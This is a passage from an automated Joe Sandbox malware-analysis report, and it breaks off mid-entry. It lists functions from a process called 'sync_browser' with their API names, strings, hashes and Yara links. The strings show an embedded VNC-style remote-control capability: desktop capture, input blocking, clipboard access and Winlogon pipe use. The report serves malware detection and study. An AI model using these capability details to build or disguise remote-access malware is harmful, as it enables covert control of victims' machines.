                                                                    • API String ID: 3851920378-1343955350
                                                                    • Opcode ID: 64e6ac3a7bdcde4c20c39546ebbbec1b22000b0516b3881d6d9525ff59da856e
                                                                    • Instruction ID: 8dcb68913c4853c4730f03e4c91ad329f5603ecffcb570ea4af7203243c62977
                                                                    • Opcode Fuzzy Hash: 64e6ac3a7bdcde4c20c39546ebbbec1b22000b0516b3881d6d9525ff59da856e
                                                                    • Instruction Fuzzy Hash: B8026D72A086DA85EB10DF24D8546AD37A9FF88B48F484537DA0DD7298DF3DE126C720
                                                                    Function 00007FF6DC0D8980 Relevance: 63.3, APIs: 24, Strings: 12, Instructions: 264registrythreadlibraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseDesktop$CreateThread$DisplaySettings$ChangeLibraryValuewprintf$AddressCurrentEnumFreeInputLoadOpenProc
                                                                    • String ID: Attach.ToDesktop$DEVICE0$DevNum:%dName:%sString:%sID:%sKey:%s$EnumDisplayDevicesA$No '%s' found.$SYSTEM$SYSTEM\CurrentControlSet\Hardware Profiles\Current$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Services\mv2$USER32$\DEVICE$mv video hook driver2$mv2
                                                                    • API String ID: 4207610217-3713657650
                                                                    • Opcode ID: cd3cd2c9535241abd372aab497dfb4bd752fa0a5a9763d12b3f41f1bb9d769e3
                                                                    • Instruction ID: 92aa8f45efa1e3f14a37d36a8143c1cb312ea26d8571b99ede306d5606628a90
                                                                    • Opcode Fuzzy Hash: cd3cd2c9535241abd372aab497dfb4bd752fa0a5a9763d12b3f41f1bb9d769e3
                                                                    • Instruction Fuzzy Hash: 32C18261A18B9A85FB508F25E8407BD63A8FF84794F444237DA5E87A94DF3CD12BC740
                                                                    Function 00007FF6DC0DA890 Relevance: 61.5, APIs: 28, Strings: 7, Instructions: 227threadwindowtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Window$Item$ProcessText$DialogForeground$CurrentLongMessageThreadsprintf$ActiveBeepDeleteFileFlashImageLoadModuleNameObjectPrivateProfileSendStringTimer
                                                                    • String ID: AutoAccept: %u$AutoAccept:%u$AutoReject: %u$AutoReject:%u$\mylogo.bmp$accept_reject_mesg$admin
                                                                    • API String ID: 384463373-239428621
                                                                    • Opcode ID: 9150f81c6ab9d50a8e6c44e1eba6f8074f889bee52a31bd6a7df91507269a3b3
                                                                    • Instruction ID: ec17e3db53a86b9cb8de494ca3128b1d62eb300df751656eae4578a231907188
                                                                    • Opcode Fuzzy Hash: 9150f81c6ab9d50a8e6c44e1eba6f8074f889bee52a31bd6a7df91507269a3b3
                                                                    • Instruction Fuzzy Hash: F3B1A431A08A5A82FB248B24E8043BD63A5FFC5764F545133DA5E83A94DF3DE567CB40
                                                                    Function 00007FF6DC0F0330 Relevance: 56.2, APIs: 20, Strings: 12, Instructions: 220windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Delete$Object$Palette$ErrorLast$Select$CreateEntriesSystem$ColorCompatibleRealizeTable
                                                                    • String ID: vncdesktop.cpp : framebuffer has %u palette entries$vncdesktop.cpp : initialised palette OK$vncdesktop.cpp : no palette data for truecolour display$vncdesktop.cpp : unable to allocate logical palette$vncdesktop.cpp : unable to create HPALETTE$vncdesktop.cpp : unable to create temporary DC$vncdesktop.cpp : unable to get system palette entries$vncdesktop.cpp : unable to restore temporary DC bitmap$vncdesktop.cpp : unable to select DIB section into temporary DC$vncdesktop.cpp : unable to select() HPALETTE$vncdesktop.cpp : unable to set DIB section palette$vncdesktop.cpp : warning - failed to RealizePalette
                                                                    • API String ID: 463275814-2693335352
                                                                    • Opcode ID: aa26c122d741df029fa551308a4514e6f6df226472759b8381794094a4369389
                                                                    • Instruction ID: 6c08651bcc6e35b56b24d799e31aa8e4506c6344b2a8a9a6020f79da2f239ec1
                                                                    • Opcode Fuzzy Hash: aa26c122d741df029fa551308a4514e6f6df226472759b8381794094a4369389
                                                                    • Instruction Fuzzy Hash: DFA19D61A1DA9B85FA10DB2598043FD23A5EF89B48F448533C94EC72A5DF3DE06BC740
                                                                    Function 00007FF6DC0D8E10 Relevance: 52.8, APIs: 20, Strings: 10, Instructions: 272registrythreadlibraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Desktop$Thread$CloseDisplayLibrarySettings$ChangeCreateFreewprintf$AddressCurrentEnumInputLoadOpenProcValue
                                                                    • String ID: Attach.ToDesktop$DEVICE0$DevNum:%dName:%sString:%sID:%sKey:%s$EnumDisplayDevicesA$No '%s' found.$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Services\mv2$USER32$\DEVICE$mv video hook driver2$mv2
                                                                    • API String ID: 27940619-3388178877
                                                                    • Opcode ID: 0339ce360284387b53255601b05480dca21fa52ca98469070f8d84e277019744
                                                                    • Instruction ID: 0215c05fbb0b8fbdf7cebc39fe8e9d1d678a91232f411a7b1e4b2394d69710ad
                                                                    • Opcode Fuzzy Hash: 0339ce360284387b53255601b05480dca21fa52ca98469070f8d84e277019744
                                                                    • Instruction Fuzzy Hash: 75C1A032A0869A85FB10CF25E8447AD77A5FB84798F444136DA4E87A94EF3DE52BC700
                                                                    Function 00007FF6DC17A228 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Time$File$_errno$FindLocalSystem__doserrno$Closefree$DriveErrorFirstLastType_getdrive_invalid_parameter_noinfo_wsopen_s
                                                                    • String ID: ./\
                                                                    • API String ID: 385398445-3176372042
                                                                    • Opcode ID: 5df5ab07e8b10f5b0de6cac4ab10895aae674884ac327e352a221a4cbdc82de0
                                                                    • Instruction ID: d96c9987a50940aaee7b0bb32b00ec2f18d1097a1a7092ac7ad5ceb2b148f3d6
                                                                    • Opcode Fuzzy Hash: 5df5ab07e8b10f5b0de6cac4ab10895aae674884ac327e352a221a4cbdc82de0
                                                                    • Instruction Fuzzy Hash: BDE1A522D0C26AC6E6609F21E85427E77A8FF45740F645036EA8D93AC5DF3DE47ADB00
                                                                    Function 00007FF6DC0C1DD0 Relevance: 45.3, APIs: 30, Instructions: 281clipboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Clipboard$CloseEmptyOpen
                                                                    • String ID:
                                                                    • API String ID: 1427272684-0
                                                                    • Opcode ID: 71ad19a431d06b663c1a9cd73ece8f0cf1ab1915d908a295cc5594be5b48716c
                                                                    • Instruction ID: d5574cb100b0c54b0008c023d3857cc02cb503aa3751648eab20dc1491a50551
                                                                    • Opcode Fuzzy Hash: 71ad19a431d06b663c1a9cd73ece8f0cf1ab1915d908a295cc5594be5b48716c
                                                                    • Instruction Fuzzy Hash: 7CC18E21B09B1A96FB24DF65E9542BD63A4AF49B84F440036CE1E837A5EF3DE427C350
                                                                    Function 00007FF6DC0EE780 Relevance: 44.0, APIs: 16, Strings: 9, Instructions: 204libraryloadertimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Create$Event$Rect$CriticalInitializeSection$AddressLibraryLoadProcTimemalloctime
                                                                    • String ID: BlockInput$USER32$mouseupdate$quit$restart$screenupdate$timer$user1$user2
                                                                    • API String ID: 33112563-1779637096
                                                                    • Opcode ID: 12d9c60dc68b12f73036889b8d411b766d5b4a22eba2f64e6bf1725f4b1690ab
                                                                    • Instruction ID: 38ddebb1b3c7e0396b4eb789fd53a43d7372ed50998e2932a87f6574a04f7e33
                                                                    • Opcode Fuzzy Hash: 12d9c60dc68b12f73036889b8d411b766d5b4a22eba2f64e6bf1725f4b1690ab
                                                                    • Instruction Fuzzy Hash: 89B11932508BD98AE3288F64F85479EB7A8FB44B04F94453AC7EA86250DF7DF066C714
                                                                    Function 00007FF6DC0C3770 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 192timewindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateObjectTimetime$CapsCompatibleDeleteDevice$BitmapBitsSelect$PixelReleaseSection
                                                                    • String ID: $benchmark.cpp : Blit time %i Getpixeltime %i Use getpixel= %i
                                                                    • API String ID: 2697070071-1399849103
                                                                    • Opcode ID: c75ecaf3627e65a832fba3c338a4f14dfa2348597fa0c2e187d05a457d19dc9d
                                                                    • Instruction ID: 6f6277ee4cb8805be113bab3ffd3a62bdf5391648df127879392ea84986d9318
                                                                    • Opcode Fuzzy Hash: c75ecaf3627e65a832fba3c338a4f14dfa2348597fa0c2e187d05a457d19dc9d
                                                                    • Instruction Fuzzy Hash: 6B81937561869A86EB148F21AC0466E73A9FB88B91F485136DD5EC7B64DF3CE026C700
                                                                    Function 00007FF6DC0E6DD1 Relevance: 40.8, APIs: 15, Strings: 8, Instructions: 552filestringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Find$CloseDesktopDriveErrorFileMode$CriticalFirstFolderFromInputLeaveListLocationLogicalMallocNextOpenPathSectionSpecialStringsTypelstrlen
                                                                    • String ID: Desktop$My Documents$Network Favorites$f$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                    • API String ID: 2965397059-206656798
                                                                    • Opcode ID: 2db8000c453640fe1383c1b2e2e44d3cb64826df7eb8e4b981688ca979fb9bf6
                                                                    • Instruction ID: 6140e8845c6e68572492965c9da6f59b773d4802c2267aef63588d45aa45e793
                                                                    • Opcode Fuzzy Hash: 2db8000c453640fe1383c1b2e2e44d3cb64826df7eb8e4b981688ca979fb9bf6
                                                                    • Instruction Fuzzy Hash: E342F522A0869A85FB608B39C8583FD27A9EB85B98F540237CA1DC76D5CF3DE556C700
                                                                    Function 00007FF6DC0D1100 Relevance: 40.6, APIs: 19, Strings: 4, Instructions: 331filesleeplibraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorFileLast$LibraryProcessSleep$AddressByteCharCloseCreateCurrentDirectoryFreeHandleLoadMultiNamedOpenPipeProcReadSystemWaitWideWritelstrcatsprintf_s
                                                                    • String ID: WinStationQueryInformationW$Winsta0\Winlogon$\\.\Pipe\TerminalServer\SystemExecSrvr\%d$\winsta.dll
                                                                    • API String ID: 2145620463-2328478964
                                                                    • Opcode ID: 3526ed3cabb8580e2c2a759d620c59a707cfd12fe60383a580afbdfaae7cafc6
                                                                    • Instruction ID: ac28d3dccaf8af8497eaa763087a48cc171c1428ced0bb654e006d92e14d3752
                                                                    • Opcode Fuzzy Hash: 3526ed3cabb8580e2c2a759d620c59a707cfd12fe60383a580afbdfaae7cafc6
                                                                    • Instruction Fuzzy Hash: C0E1F632A0869A85F7208F64E8447BD73A4FF847A8F400236DA5E87A94DF3DD667C740
                                                                    Function 00007FF6DC0E4D7E Relevance: 38.9, APIs: 18, Strings: 4, Instructions: 441COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: System$InfoMetricsParameters$Desktopmouse_event$CloseCursorInputOpen
                                                                    • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                    • API String ID: 246551654-3977938048
                                                                    • Opcode ID: 8a846c19ca448c6dfd4fc0fae66a9b6d9b90a853b31161baa3ad83bdd6464dec
                                                                    • Instruction ID: b616019a2ee50dac9f15d373ddadd4ec2ffba0f7bcbe4d2e7e589ab758c60036
                                                                    • Opcode Fuzzy Hash: 8a846c19ca448c6dfd4fc0fae66a9b6d9b90a853b31161baa3ad83bdd6464dec
                                                                    • Instruction Fuzzy Hash: 9722D032A0869586F7648B65C8587FE37A9FB85B48F054136CA4DC77A4CF3EE466C700
                                                                    Function 00007FF6DC0D8590 Relevance: 38.8, APIs: 15, Strings: 7, Instructions: 266threadlibraryloaderCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
